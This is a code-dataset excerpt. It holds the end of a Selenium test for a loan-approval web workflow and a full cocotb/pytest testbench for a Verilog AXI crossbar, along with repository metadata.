approveinterviepage.scroll_to_is_phone_check()
approveinterviepage.select_is_phone_check(isphonecheck)
approveinterviepage.input_phone_check_message(phonecheckmessage)
approveinterviepage.click_phone_save_button()
time.sleep(1)
approveinterviepage.select_is_fujian_over(isfujianover)
approveinterviepage.click_fujian_save_button()
time.sleep(1)
approveinterviepage.scroll_to_approve_view()
approveinterviepage.input_approve_view(approve_view)
approveinterviepage.click_tongguo()
approveinterviepage.click_confirm()
time.sleep(5)
todopage.click_first_row(types)
approveinterviepage.scroll_to_card_date()
approveinterviepage.input_card_daoqi_date(card_daoqi_date)
approveinterviepage.click_save_bank_loan_data()
time.sleep(1)
tools.create_huankuanjihua(self.fullname)
approveinterviepage.input_file(file_path)
time.sleep(3)
approveinterviepage.input_approve_view(approve_view)
approveinterviepage.click_tongguo()
approveinterviepage.click_confirm()
time.sleep(5)
menu.go_to_loan_query(self.driver)
actual_result = approveinterviepage.get_result(self.loanno)
self.assertEqual(actual_result, expect_result)
print("审批面签提报结束")
except Exception as e:
tools.get_screenshot(self.driver, self.screenshot_path, casename)
raise e
def test_l_loan_clear(self):
u"""贷款结清"""
casename = sys._getframe().f_code.co_name
payname = self.fullname
# self.loanno = "SK0027-BP-1801-00002"
from com.ea.common import loan_clear
loan_clear.loan_clear(self.driver, payname, self.loanno, casename, self.screenshot_path, )
def test_m_loan_clear_approve(self):
u"""审批贷款结清流程"""
casename = sys._getframe().f_code.co_name
from com.ea.common import loan_clear
loan_clear.loan_clear_approve(self.driver, self.loanno, self.screenshot_path, casename)
if __name__ == '__main__':
unittest.main()
| [
"lijie"
] | lijie | |
d54d706d83747cf914fb4c1c78c528103f7b8930 | 6b8681327ca166cf0f04891fa78f124e27ab85d7 | /tb/axi_crossbar/test_axi_crossbar.py | e647a5c2ca6fea817fe347b85cabc41702775f4f | [
"MIT"
] | permissive | jerry-jho/verilog-axi | d95657e8b8443f8d58032cb642c897fb7efa4e3a | fbb507be8218fd61a58e364de6c8f73dda0709d7 | refs/heads/master | 2021-12-14T12:37:17.797360 | 2021-11-15T22:31:28 | 2021-11-15T22:31:28 | 237,615,694 | 0 | 0 | MIT | 2020-02-01T13:01:29 | 2020-02-01T13:01:28 | null | UTF-8 | Python | false | false | 10,404 | py | """
Copyright (c) 2020 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import itertools
import logging
import os
import random
import subprocess
import cocotb_test.simulator
import pytest
import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge, Timer
from cocotb.regression import TestFactory
from cocotbext.axi import AxiBus, AxiMaster, AxiRam
class TB(object):
    """Testbench harness: attaches cocotb AXI masters and RAM models to the DUT."""

    def __init__(self, dut):
        self.dut = dut

        # Port counts are discovered from the elaborated crossbar instance.
        num_s_ports = len(dut.axi_crossbar_inst.s_axi_awvalid)
        num_m_ports = len(dut.axi_crossbar_inst.m_axi_awvalid)

        self.log = logging.getLogger("cocotb.tb")
        self.log.setLevel(logging.DEBUG)

        # Free-running clock, 10 ns period.
        cocotb.fork(Clock(dut.clk, 10, units="ns").start())

        # One traffic-generating master per slave-side port of the DUT.
        self.axi_master = []
        for idx in range(num_s_ports):
            bus = AxiBus.from_prefix(dut, f"s{idx:02d}_axi")
            self.axi_master.append(AxiMaster(bus, dut.clk, dut.rst))

        # One 64 KiB RAM model per master-side port of the DUT.
        self.axi_ram = []
        for idx in range(num_m_ports):
            bus = AxiBus.from_prefix(dut, f"m{idx:02d}_axi")
            self.axi_ram.append(AxiRam(bus, dut.clk, dut.rst, size=2**16))

        for ram in self.axi_ram:
            # prevent X propagation from screwing things up - "anything but X!"
            # (X on bid and rid can propagate X to ready/valid)
            ram.write_if.b_channel.bus.bid.setimmediatevalue(0)
            ram.read_if.r_channel.bus.rid.setimmediatevalue(0)

    def set_idle_generator(self, generator=None):
        """Throttle the valid side of every request channel with *generator*."""
        if not generator:
            return
        for master in self.axi_master:
            master.write_if.aw_channel.set_pause_generator(generator())
            master.write_if.w_channel.set_pause_generator(generator())
            master.read_if.ar_channel.set_pause_generator(generator())
        for ram in self.axi_ram:
            ram.write_if.b_channel.set_pause_generator(generator())
            ram.read_if.r_channel.set_pause_generator(generator())

    def set_backpressure_generator(self, generator=None):
        """Throttle the ready side of every response channel with *generator*."""
        if not generator:
            return
        for master in self.axi_master:
            master.write_if.b_channel.set_pause_generator(generator())
            master.read_if.r_channel.set_pause_generator(generator())
        for ram in self.axi_ram:
            ram.write_if.aw_channel.set_pause_generator(generator())
            ram.write_if.w_channel.set_pause_generator(generator())
            ram.read_if.ar_channel.set_pause_generator(generator())

    async def cycle_reset(self):
        """Pulse the active-high reset for two clock cycles."""
        self.dut.rst.setimmediatevalue(0)
        for _ in range(2):
            await RisingEdge(self.dut.clk)
        self.dut.rst.value = 1
        for _ in range(2):
            await RisingEdge(self.dut.clk)
        self.dut.rst.value = 0
        for _ in range(2):
            await RisingEdge(self.dut.clk)
async def run_test_write(dut, data_in=None, idle_inserter=None, backpressure_inserter=None, size=None, s=0, m=0):
    """Sweep write bursts of varying length/offset from master *s* into RAM *m*."""
    tb = TB(dut)

    wr_if = tb.axi_master[s].write_if
    byte_lanes = wr_if.byte_lanes
    if size is None:
        size = wr_if.max_burst_size

    await tb.cycle_reset()

    tb.set_idle_generator(idle_inserter)
    tb.set_backpressure_generator(backpressure_inserter)

    # Short bursts around the lane width plus one long burst; offsets hug
    # both sides of a 4 KiB boundary.
    lengths = [*range(1, byte_lanes*2), 1024]
    offsets = [*range(byte_lanes, byte_lanes*2), *range(4096-byte_lanes, 4096)]

    for length in lengths:
        for offset in offsets:
            tb.log.info("length %d, offset %d, size %d", length, offset, size)
            ram_addr = 0x1000 + offset
            addr = ram_addr + m*0x1000000
            test_data = bytearray(x % 256 for x in range(length))

            # Pre-fill guard bytes around the target region.
            tb.axi_ram[m].write(ram_addr-128, b'\xaa'*(length+256))

            await tb.axi_master[s].write(addr, test_data, size=size)

            tb.log.debug("%s", tb.axi_ram[m].hexdump_str((ram_addr & ~0xf)-16, (((ram_addr & 0xf)+length-1) & ~0xf)+48))

            # Payload landed intact and the neighbouring guard bytes survived.
            assert tb.axi_ram[m].read(ram_addr, length) == test_data
            assert tb.axi_ram[m].read(ram_addr-1, 1) == b'\xaa'
            assert tb.axi_ram[m].read(ram_addr+length, 1) == b'\xaa'

    await RisingEdge(dut.clk)
    await RisingEdge(dut.clk)
async def run_test_read(dut, data_in=None, idle_inserter=None, backpressure_inserter=None, size=None, s=0, m=0):
    """Sweep read bursts of varying length/offset from master *s* against RAM *m*."""
    tb = TB(dut)

    wr_if = tb.axi_master[s].write_if
    byte_lanes = wr_if.byte_lanes
    if size is None:
        size = wr_if.max_burst_size

    await tb.cycle_reset()

    tb.set_idle_generator(idle_inserter)
    tb.set_backpressure_generator(backpressure_inserter)

    # Short bursts around the lane width plus one long burst; offsets hug
    # both sides of a 4 KiB boundary.
    lengths = [*range(1, byte_lanes*2), 1024]
    offsets = [*range(byte_lanes, byte_lanes*2), *range(4096-byte_lanes, 4096)]

    for length in lengths:
        for offset in offsets:
            tb.log.info("length %d, offset %d, size %d", length, offset, size)
            ram_addr = 0x1000 + offset
            addr = ram_addr + m*0x1000000
            test_data = bytearray(x % 256 for x in range(length))

            # Seed the backing RAM, then read it back through the crossbar.
            tb.axi_ram[m].write(ram_addr, test_data)

            data = await tb.axi_master[s].read(addr, length, size=size)

            assert data.data == test_data

    await RisingEdge(dut.clk)
    await RisingEdge(dut.clk)
async def run_stress_test(dut, idle_inserter=None, backpressure_inserter=None):
    """Hammer the crossbar with concurrent randomised read/write traffic."""
    tb = TB(dut)

    await tb.cycle_reset()

    tb.set_idle_generator(idle_inserter)
    tb.set_backpressure_generator(backpressure_inserter)

    async def worker(master, offset, aperture, count=16):
        # Each iteration writes random-length data to a random RAM within
        # the worker's aperture, then reads it back and verifies it.
        for _ in range(count):
            m = random.randrange(len(tb.axi_ram))
            length = random.randint(1, min(512, aperture))
            addr = offset+random.randint(0, aperture-length) + m*0x1000000
            test_data = bytearray(x % 256 for x in range(length))

            await Timer(random.randint(1, 100), 'ns')
            await master.write(addr, test_data)

            await Timer(random.randint(1, 100), 'ns')
            data = await master.read(addr, length)
            assert data.data == test_data

    # Sixteen workers, assigned round-robin across the available masters,
    # each confined to its own 4 KiB aperture.
    workers = []
    for i in range(16):
        task = worker(tb.axi_master[i % len(tb.axi_master)], i*0x1000, 0x1000, count=16)
        workers.append(cocotb.fork(task))

    while workers:
        await workers.pop(0).join()

    await RisingEdge(dut.clk)
    await RisingEdge(dut.clk)
def cycle_pause():
    """Return an endless pause pattern: three paused cycles, one active."""
    return itertools.cycle((1, 1, 1, 0))
# Register cocotb tests only when this module is loaded inside a running
# simulator (cocotb.SIM_NAME is empty when imported by pytest for discovery).
if cocotb.SIM_NAME:

    # Geometry is read back from the elaborated toplevel wrapper.
    s_count = len(cocotb.top.axi_crossbar_inst.s_axi_awvalid)
    m_count = len(cocotb.top.axi_crossbar_inst.m_axi_awvalid)

    data_width = len(cocotb.top.s00_axi_wdata)
    byte_lanes = data_width // 8
    max_burst_size = (byte_lanes-1).bit_length()

    # Generate one cocotb test per combination of pause generators and
    # source/destination port indices (capped at 2 each to bound runtime).
    for test in [run_test_write, run_test_read]:
        factory = TestFactory(test)
        factory.add_option("idle_inserter", [None, cycle_pause])
        factory.add_option("backpressure_inserter", [None, cycle_pause])
        # factory.add_option("size", [None]+list(range(max_burst_size)))
        factory.add_option("s", range(min(s_count, 2)))
        factory.add_option("m", range(min(m_count, 2)))
        factory.generate_tests()

    factory = TestFactory(run_stress_test)
    factory.generate_tests()
# cocotb-test

# Directory holding this test module, and the RTL sources under test.
tests_dir = os.path.abspath(os.path.dirname(__file__))
rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl'))
@pytest.mark.parametrize("data_width", [8, 16, 32])
@pytest.mark.parametrize("m_count", [1, 4])
@pytest.mark.parametrize("s_count", [1, 4])
def test_axi_crossbar(request, s_count, m_count, data_width):
    """Build an ``s_count`` x ``m_count`` crossbar wrapper and simulate it.

    A Verilog wrapper with the requested port counts is generated on demand
    by ``axi_crossbar_wrap.py``, then the cocotb tests defined in this module
    are run against it via cocotb-test.
    """
    dut = "axi_crossbar"
    wrapper = f"{dut}_wrap_{s_count}x{m_count}"
    module = os.path.splitext(os.path.basename(__file__))[0]
    toplevel = wrapper

    # generate wrapper; fail loudly (CalledProcessError) if the generator
    # script errors out, instead of letting the simulator die later with a
    # confusing missing-file message
    wrapper_file = os.path.join(tests_dir, f"{wrapper}.v")
    if not os.path.exists(wrapper_file):
        subprocess.run(
            [os.path.join(rtl_dir, f"{dut}_wrap.py"), "-p", f"{s_count}", f"{m_count}"],
            cwd=tests_dir,
            check=True
        )

    verilog_sources = [
        wrapper_file,
        os.path.join(rtl_dir, f"{dut}.v"),
        os.path.join(rtl_dir, f"{dut}_addr.v"),
        os.path.join(rtl_dir, f"{dut}_rd.v"),
        os.path.join(rtl_dir, f"{dut}_wr.v"),
        os.path.join(rtl_dir, "axi_register_rd.v"),
        os.path.join(rtl_dir, "axi_register_wr.v"),
        os.path.join(rtl_dir, "arbiter.v"),
        os.path.join(rtl_dir, "priority_encoder.v"),
    ]

    parameters = {}

    parameters['S_COUNT'] = s_count
    parameters['M_COUNT'] = m_count
    parameters['DATA_WIDTH'] = data_width
    parameters['ADDR_WIDTH'] = 32
    parameters['STRB_WIDTH'] = parameters['DATA_WIDTH'] // 8
    parameters['S_ID_WIDTH'] = 8
    # master-side IDs carry extra bits to disambiguate the source port
    parameters['M_ID_WIDTH'] = parameters['S_ID_WIDTH'] + (s_count-1).bit_length()
    parameters['AWUSER_ENABLE'] = 0
    parameters['AWUSER_WIDTH'] = 1
    parameters['WUSER_ENABLE'] = 0
    parameters['WUSER_WIDTH'] = 1
    parameters['BUSER_ENABLE'] = 0
    parameters['BUSER_WIDTH'] = 1
    parameters['ARUSER_ENABLE'] = 0
    parameters['ARUSER_WIDTH'] = 1
    parameters['RUSER_ENABLE'] = 0
    parameters['RUSER_WIDTH'] = 1
    parameters['M_REGIONS'] = 1

    # expose parameters to the cocotb process via the environment
    extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()}

    sim_build = os.path.join(tests_dir, "sim_build",
        request.node.name.replace('[', '-').replace(']', ''))

    cocotb_test.simulator.run(
        python_search=[tests_dir],
        verilog_sources=verilog_sources,
        toplevel=toplevel,
        module=module,
        parameters=parameters,
        sim_build=sim_build,
        extra_env=extra_env,
    )
| [
"alex@alexforencich.com"
] | alex@alexforencich.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.